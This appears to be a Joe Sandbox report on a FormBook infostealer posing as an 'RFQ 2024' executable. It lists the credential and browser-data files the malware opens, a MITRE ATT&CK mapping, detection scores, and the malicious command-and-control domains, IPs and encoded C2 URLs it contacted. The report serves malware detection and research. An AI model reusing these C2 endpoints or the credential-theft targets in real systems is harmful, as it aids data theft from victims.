Source: nosimiokOMOHm.exe, 00000003.00000000.108995596123.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000003.00000002.113717186558.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113718550180.00000000018F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\write.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	100%	Avira	HEUR/AGEN.1309993
AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	64%	Virustotal		Browse
AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.StealC
AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
d81dp.top	0%	Virustotal	Browse
academyinmotion.xyz	0%	Virustotal	Browse
huayang.302.gn301.xyz	3%	Virustotal	Browse
allinathletes.biz	0%	Virustotal	Browse
barbequecritics.com	0%	Virustotal	Browse
1clickw2.net	0%	Virustotal	Browse
www.ly0.xyz	1%	Virustotal	Browse
www.lunch.delivery	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Link
https://duckduckgo.com/ac/?q=	0%	Virustotal	Browse
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	0%	Virustotal	Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal	Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal	Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
d81dp.top	154.23.184.194	true	true	0%, Virustotal, Browse	unknown
myrideguy.net	68.66.226.116	true	true		unknown
academyinmotion.xyz	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.awesomearv.buzz	161.97.168.245	true	true		unknown
huayang.302.gn301.xyz	172.247.44.157	true	false	3%, Virustotal, Browse	unknown
allinathletes.biz	15.197.148.33	true	true	0%, Virustotal, Browse	unknown
www.heeraka.info	75.2.103.23	true	true		unknown
levelsabovetravel.info	3.33.130.190	true	true		unknown
www.numbox.live	63.250.47.57	true	true		unknown
barbequecritics.com	15.197.148.33	true	true	0%, Virustotal, Browse	unknown
1clickw2.net	15.197.148.33	true	true	0%, Virustotal, Browse	unknown
www.ly0.xyz	172.67.220.57	true	true	1%, Virustotal, Browse	unknown
wineservicesgroup.net	15.197.148.33	true	true		unknown
mjcregionsud.org	91.212.26.5	true	true		unknown
030002252.xyz	65.21.196.90	true	true		unknown
www.lunch.delivery	76.223.54.146	true	true	1%, Virustotal, Browse	unknown
www.academyinmotion.xyz	unknown	unknown	true		unknown
www.allinathletes.biz	unknown	unknown	true		unknown
www.d81dp.top	unknown	unknown	true		unknown
www.barbequecritics.com	unknown	unknown	true		unknown
www.myrideguy.net	unknown	unknown	true		unknown
www.wineservicesgroup.net	unknown	unknown	true		unknown
www.60881.xyz	unknown	unknown	true		unknown
www.030002252.xyz	unknown	unknown	true		unknown
www.levelsabovetravel.info	unknown	unknown	true		unknown
www.mjcregionsud.org	unknown	unknown	true		unknown
www.1clickw2.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://www.levelsabovetravel.info/kbee/	true	unknown
http://www.mjcregionsud.org/r61b/?ATk=3quBh4mzL0lL+B9uaB4+B/ehh8Vuymt6GENoLoKygJVSWFdT0X7NdoMT/6uiE3Ni1BD7Zx2rh99upTwYdPvuPJZKDP4PvDgre2/rGfgIw+gfAM2DFPuj10Q=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.allinathletes.biz/te6q/	true	unknown
http://www.barbequecritics.com/el3s/?ATk=6Ta3dC1SbFexLGaAyLCMrvtEQp7UC9YLWm/0OzXEbXNGBqYW7sBnSGUWAqT2FNWebLiZ+YaCaloaRZMkiWHL7MfZ4P+RlEyvopkHNBDi+G5Q1FNXiRoH7Ec=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.academyinmotion.xyz/63ck/?VDohI=5PBL_pQpTf5haV&ATk=GQYraOg50FzHvWxTy80tg7qVvSVsbKUl1pszYO6BquwY8zCRfPuOPPXv6opwWQ+1qa0YVJN1ZlZd4AL6pjVcwJbg0c3Bicl+U/54azLqH+7Ms3QB2BiQv0s=	true	unknown
http://www.levelsabovetravel.info/kbee/?ATk=DCgTIaYcg8rLkvez6bpKNDdTbca+kjCnkbIF1Zor3lwvkrlOJ/rxEw94juCbWbA1v3jo2CjSkAc6+9U16ObyEt1HYmrMXA9V8CM6TYsVGbC64eHlmw9Jr2w=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.myrideguy.net/kgyd/	true	unknown
http://www.heeraka.info/o7wc/	true	unknown
http://www.myrideguy.net/kgyd/?ATk=Wu3HLPqvQhberYZQa3Sb+njlvaNnBpLcCB7xsP8R/99k0A4wkukwLWIZ+Z7OJCWhofveZifw88127MBJWT7MTleP4HHJ+1MXSr+cpLCtjuYkBkW6/d1uK4M=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.numbox.live/q7ah/	true	unknown
http://www.lunch.delivery/qwed/	true	unknown
http://www.d81dp.top/9m01/	true	unknown
http://www.heeraka.info/o7wc/?ATk=noDrsAMitbMGukbGKxuVrzEgPh3D0G5ivpvnAiMvw1nUlPzFIxH7oxFbrZBuy0eo4pgag2ycYt5GuEsaJdfqEojluDYCwMecMBaiZUwNTn9hiFtAJi2C0g0=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.ly0.xyz/vshw/?ATk=EspU2mytRZKz4auAzU3Q1p3hOp6U+fvbelDltaue1VIW4sYIVCILykrSg5ScN2hRjv7eCPLeVYxJkFe87LUrJKeKTtCcyXc83om833z/vTsR6D13pLQ0NOo=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.barbequecritics.com/el3s/	true	unknown
http://www.numbox.live/q7ah/?ATk=yQb1MnoYePGa+D7HYXNMgCWfQwyPM5qgSNNB5eb+vdtsin1jnkdmik2CDVoWxFHrVuMckJ02SL88S12T7EptqLmfnh4CTyoL2s7wDlIiRZZ8USqQIrqm93w=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.1clickw2.net/9bnb/	true	unknown
http://www.wineservicesgroup.net/hv5a/	true	unknown
http://www.awesomearv.buzz/53bw/	true	unknown
http://www.d81dp.top/9m01/?ATk=YTEnPXeuvLCqp8pRYpXUCZpIg36YHpIu3aiFszfHZiHCethv0UoX0rLDgO0m0L5Zay3qgh7+EeCD2cfEa0kxUJqZj+V+1gWSSyE2BB2v0BjXvCGVFHNVoHA=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.mjcregionsud.org/r61b/	true	unknown
http://www.1clickw2.net/9bnb/?ATk=XgXvlhFLn0yasIzwV8HNefiGaWxYWjFs+Vu5QhEKO2I7xekKRpo59pX70vTgc6tofct2g55bDtxMjf3b70N1jPElytkl9t3yc3m2himnW0R7Cxc4fJK3SCo=&VDohI=5PBL_pQpTf5haV	true	unknown
http://www.ly0.xyz/vshw/	true	unknown
http://www.allinathletes.biz/te6q/?VDohI=5PBL_pQpTf5haV&ATk=Bi48EnnHLnucFoFteYAZbM12VO+YpqUowmdcea1K+IX7Dd8zgRCPoE2+V26bo8zYK23oBEB5tVQZMZR237sZLVeieLGkB+ILMPGhp+qwj0taeKVYBLshWkk=	true	unknown
http://www.030002252.xyz/2ncs/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	false	0%, Virustotal, Browse	unknown
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	Um65m294.4.dr	false	0%, Virustotal, Browse	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Um65m294.4.dr	false	0%, Virustotal, Browse	unknown
https://http.gn301.com:12345/?u=	write.exe, 00000004.00000002.112737835650.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.0000000003C4C000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	write.exe, 00000004.00000003.109269510237.000000000809F000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	false		unknown
http://www.dzyngiri.com	write.exe, 00000004.00000002.112737835650.00000000065D4000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.0000000004294000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://justinmezzell.com	write.exe, 00000004.00000002.112737835650.00000000065D4000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.0000000004294000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://myrideguy.net/kgyd/?ATk=Wu3HLPqvQhberYZQa3Sb	write.exe, 00000004.00000002.112737835650.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113719291056.00000000045B8000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gemini.google.com/app?q=	write.exe, 00000004.00000003.109265616086.0000000008032000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.numbox.live	nosimiokOMOHm.exe, 00000005.00000002.113717742258.00000000012C9000.00000040.80000000.00040000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.247.44.157	huayang.302.gn301.xyz	United States	21859	ZNETUS	false
15.197.148.33	allinathletes.biz	United States	7430	TANDEMUS	true
75.2.103.23	www.heeraka.info	United States	16509	AMAZON-02US	true
65.21.196.90	030002252.xyz	United States	199592	CP-ASDE	true
76.223.54.146	www.lunch.delivery	United States	16509	AMAZON-02US	true
91.212.26.5	mjcregionsud.org	France	47891	WEBINDUSTRIEFR	true
154.23.184.194	d81dp.top	United States	174	COGENT-174US	true
63.250.47.57	www.numbox.live	United States	22612	NAMECHEAP-NETUS	true
3.33.130.190	academyinmotion.xyz	United States	8987	AMAZONEXPANSIONGB	true
161.97.168.245	www.awesomearv.buzz	United States	51167	CONTABODE	true
172.67.220.57	www.ly0.xyz	United States	13335	CLOUDFLARENETUS	true
68.66.226.116	myrideguy.net	United States	55293	A2HOSTINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1531497
Start date and time:	2024-10-11 09:57:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 18m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@17/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 100 Number of non-executed functions: 262
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Execution Graph export aborted for target nosimiokOMOHm.exe, PID 4240 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:00:57	API Interceptor	33545404x Sleep call for process: write.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
15.197.148.33	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.ethetf.digital/m7sk/
	LgzpILNkS2.exe	Get hash	malicious	FormBook	Browse	www.warriorsyndrome.net/yaso/
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	15.197.148.33/
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	15.197.148.33/
	firmware.sh4.elf	Get hash	malicious	Unknown	Browse	15.197.148.33/
	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	15.197.148.33/
	fptlVDDPkS.dll	Get hash	malicious	Quasar	Browse	freegeoip.net/xml/
	zE7Ken4cFt.dll	Get hash	malicious	Quasar	Browse	freegeoip.net/xml/
	fptlVDDPkS.dll	Get hash	malicious	Quasar	Browse	freegeoip.net/xml/
	zE7Ken4cFt.dll	Get hash	malicious	Quasar	Browse	freegeoip.net/xml/
75.2.103.23	PO59458.exe	Get hash	malicious	FormBook	Browse	www.webeuz.buzz/okq4/
65.21.196.90	NU1aAbSmCr.exe	Get hash	malicious	FormBook	Browse	www.030002304.xyz/6uay/
	8EhMjL3yNF.exe	Get hash	malicious	FormBook	Browse	www.030002304.xyz/f06i/
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.030002837.xyz/y045/
	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	www.070001294.xyz/90jl/
	5FRWRDOqk7.exe	Get hash	malicious	FormBook	Browse	www.030002721.xyz/st0f/?-hF=sZ0LOH4&HPBxr6=OZJ3FWHE8eHsfWE6sR/jZh7GV9NsFGiNmpPQ4eftWQT1hyascoenGoAxdn6KH9WZ2QPSeMYxIK2pDBtCkY1R4v4J1R7l9kCKhVgR/LucEqSnpRqwhg==
	RQ#071024.exe	Get hash	malicious	FormBook	Browse	www.030003302.xyz/1nuz/?LT=aZbPzzPX3H&O47=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4OidZAp+cuSwNE5fzYgJgK5BTkLsTa3g==
	Arrival notice.exe	Get hash	malicious	FormBook	Browse	www.030002304.xyz/u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl
	rpedido-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.030002626.xyz/49rz/
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.030002803.xyz/l4gu/
	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	www.030002837.xyz/zl45/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
huayang.302.gn301.xyz	PO#001498.exe	Get hash	malicious	FormBook	Browse	107.148.177.200
	Electronic Order.exe	Get hash	malicious	FormBook	Browse	154.222.238.52
	Inquiry PR#27957.bat.exe	Get hash	malicious	FormBook	Browse	154.12.34.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ZNETUS	https://ercdz.com/	Get hash	malicious	Unknown	Browse	128.1.77.230
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	172.96.116.38
	uRFbDRQKLY.exe	Get hash	malicious	Unknown	Browse	103.133.93.52
	na.elf	Get hash	malicious	Mirai	Browse	172.96.116.33
	http://wap.smarthomehungary.com/	Get hash	malicious	Unknown	Browse	199.91.74.209
	http://peru-spost.shop/	Get hash	malicious	Unknown	Browse	199.91.74.184
	http://www.nesianlife.com/	Get hash	malicious	Unknown	Browse	199.91.74.174
	https://bb33382.com:8365/?register=1&agent=4374577496	Get hash	malicious	Unknown	Browse	128.1.157.230
	http://webmail-7ba16a93.elod.com.br/?id=voiceofdesign.fr	Get hash	malicious	Unknown	Browse	172.96.117.215
	https://b8275.com/	Get hash	malicious	Unknown	Browse	128.1.157.228
AMAZON-02US	na.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	na.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	na.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	na.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	https://clicks.trx-hub.com/xid/pmc_0aaa4_wwd?q=https://aussiebongs.com/#aHdheXVuLmxlZSRoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	34.248.166.153
	cqdEWgq9fW.elf	Get hash	malicious	Mirai	Browse	18.248.101.43
	https://click.convertkit-mail2.com/5qu5o5736ps9fmg8vef6h94dwl44sn/08hwhgud6vg92gcp/aHR0cHM6Ly9hcHAua2l0LmNvbS9mb3Jtcy9jb25maXJtP2tleT00ZjNhZDk2YjE5MDViYjJjM2YxZjhkYzUwZWI2ZjU4YWJiNmUxZTExJnNpZD05MDY1MDIxMTg0	Get hash	malicious	Unknown	Browse	3.18.56.123
	http://sycuan.com/	Get hash	malicious	Unknown	Browse	52.28.39.231
	https://linkin.bio/moodyinsurance	Get hash	malicious	Unknown	Browse	108.138.7.80
	HUWwCrf0mn.elf	Get hash	malicious	Mirai, Okiru	Browse	44.233.80.244
TANDEMUS	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195
	na.elf	Get hash	malicious	Mirai	Browse	16.252.73.195

Process:	C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.354384827676232
Encrypted:	false
SSDEEP:	24:MLUE4K5E4K1Bs1qE4qXKDE4KhKMaKhPKIE4oKnKoZAE4KzD1E4x84j:MIHK5HK1Bs1qHiYHKh6oPtHoAhAHKzhp
MD5:	511475387A5161D4052316C38F7FF282
SHA1:	2CE71F7A372D6965DD42B71EEC5E8F81D43343B3
SHA-256:	AD084A10414740C5054EDBCF76007E75F9E7456D3C7C5DA8865F0ECD491A6E61
SHA-512:	E60E0218C46DF20260D81B7A1FBD69BF019C54E36A8ACDB74ADAB91A90BD8960ECC8E16F3872851119DA05E72787433DD3C54E099F9E6526342E05C38D5364C7
Malicious:	true
Reputation:	moderate, very likely benign file
